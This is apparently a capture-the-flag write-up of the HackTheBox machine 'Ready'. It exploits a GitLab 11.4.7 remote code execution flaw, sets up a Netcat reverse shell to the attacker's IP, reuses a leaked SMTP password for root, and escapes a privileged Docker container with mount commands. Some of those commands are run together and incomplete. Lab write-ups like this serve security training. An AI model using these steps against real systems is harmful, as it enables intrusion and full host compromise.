Ready is a Linux machine from HackTheBox, that installed the GitLab system under the docker container environment.
After basic enumeration, it was found that the GitLab version was 11.4.7. It suffers from a Remote Code Execution exploit listed with CVE-2018–19571 + CVE-2018–19585. Using the exploit-db provided script. The initial shell was obtained and got the user flag.
Further enumerating the system, a docker configuration file was found at a backup folder that contained an SMTP password. This password can be sudo to the root account. Unfortunately, the root flag was not found under this account.
According to the backup file found above, the current environment should be inside a docker container. Following this article on escaping docker privileged containers, the host's root access was obtained and the root flag was got finally.
System patching is the most effective preventive control. Avoiding enabling the privileged flag at the Docker containers, these privileged containers might allow attackers to break the control and gain the host system asscess.
Target Machine: 10.10.10.220
Attacker Machine: 10.10.14.16
Enumerating the available services of the target machine using Nmap aggressive scanning to all available ports.
Checking the HTTP port 5080, web enumeration
A GitLab Community Edition was found on the HTTP port 5080, lets register and log in to the GitLab;
After logging in to the application, the version of this GitLab can be found in the help section which is version 11.4.7. Searching with the searchsploit, it was found that it is a vulnerable version and has a number of exploits CVE's available.
Just picked a REC exploit code 49257, and using Burp Suite to capture the data of cookie and authenticity token during create a GitLab project. After updated the python code and prepared the return Netcat listener on port 1234.
username='fkclai'authenticity_token='kU0yx1Br8Yk7YQl+TrW9WPVqUTUaBf57KBBrtmpA60cexj39oN6dTKOfWJ5f6yv/WlTPHd6jntiC6xCCPDzP4w=='cookie = '_gitlab_session=abd8e08f8d2d6d32dd8e6718572414e7; sidebar_collapsed=false; experimentation_subject_id=ImJiYjA1NTc2LTE3YjItNDc3OC04MTBkLTgwNzM4YjU2YmI2NSI%3D--08def3ebde2700b4d281b24b65d2221d8f94dbef'localport='1234'localip='10.10.14.15'url = "http://10.10.10.220:5080"
Used the Linux PE Tool - LinPEAS, a backup /opt/backup folder was found that contained a gitlab.rb file in which found the smtp_password (wW59U!ZKMbG9+*#h). This password can be used to sudo root access.
After sudo to root account, but the root flag was not found in the home or root folder. Why? we were inside the docker container.
#determine if a process runs inside lxc/Dockergrep 'docker\|lxc' /proc/1/cgroup
With the help of an article about escaping Docker Privileged Containers, the following command was done and get the host root privilege access finally.
$ mkdir /tmp/test$ mount /dev/sda2$ cat /tmp/test/root/root.txt